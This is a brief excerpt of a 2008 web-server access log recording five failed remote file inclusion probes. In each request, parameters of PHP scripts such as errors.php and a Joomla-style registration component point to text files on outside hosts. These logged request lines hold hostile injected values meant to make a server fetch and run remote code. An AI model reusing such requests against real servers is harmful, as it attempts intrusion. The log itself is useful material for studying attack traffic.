69.94.108.111 - - [03/Nov/2008:10:36:10 -0600] "GET /logs//vwar/backup/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.94.108.111 - - [03/Nov/2008:10:36:10 -0600] "GET /logs/access_log.1208044800//vwar/backup/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
203.146.26.91 - - [03/Nov/2008:10:40:09 -0600] "GET /logs/access_log.1206144000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 378 "-""libwww-perl/5.79"
217.153.37.130 - - [03/Nov/2008:10:41:57 -0600] "GET /logs//errors.php?error=http://www.gundemde.com/l333tbi1tX.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
217.153.37.130 - - [03/Nov/2008:10:42:00 -0600] "GET //errors.php?error=http://www.gundemde.com/l333tbi1tX.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
